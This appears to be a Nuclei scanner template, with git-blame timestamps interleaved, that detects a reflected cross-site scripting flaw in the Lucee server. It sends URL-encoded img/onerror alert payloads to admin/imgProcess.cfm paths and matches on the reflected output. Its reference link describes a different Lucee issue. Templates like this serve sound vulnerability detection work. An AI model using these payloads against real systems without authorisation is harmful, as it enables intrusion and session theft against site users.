2021-10-06 11:08:23 +00:00
id : lucee-xss
info :
2022-09-23 17:53:08 +00:00
name : Lucee - Cross-Site Scripting
2021-10-06 11:08:23 +00:00
author : incogbyte
2022-09-23 17:53:08 +00:00
severity : high
description : Lucee contains a cross-site scripting vulnerability. It allows remote attackers to inject arbitrary JavaScript into the responses returned by the server.
reference :
- https://www.acunetix.com/vulnerabilities/web/lucee-server-arbitrary-file-creation/
classification :
cvss-metrics : CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N
cvss-score : 7.2
cwe-id : CWE-79
2022-09-09 17:34:37 +00:00
tags : lucee,xss,unauth
2021-10-06 11:08:23 +00:00
requests :
- method : GET
path :
- "{{BaseURL}}/lucees3ezf%3cimg%20src%3da%20onerror%3dalert('{{randstr}}')%3elujb7/admin/imgProcess.cfm"
- "{{BaseURL}}/lucee/lucees3ezf%3cimg%20src%3da%20onerror%3dalert('{{randstr}}')%3elujb7/admin/imgProcess.cfm"
stop-at-first-match : true
matchers-condition : and
matchers :
- type : word
words :
- "<img src=a onerror=alert('{{randstr}}')>"
- "MissingIncludeException"
- "lucee-err"
part : body
condition : and
2022-09-23 17:53:08 +00:00
# Enhanced by mp on 2022/09/23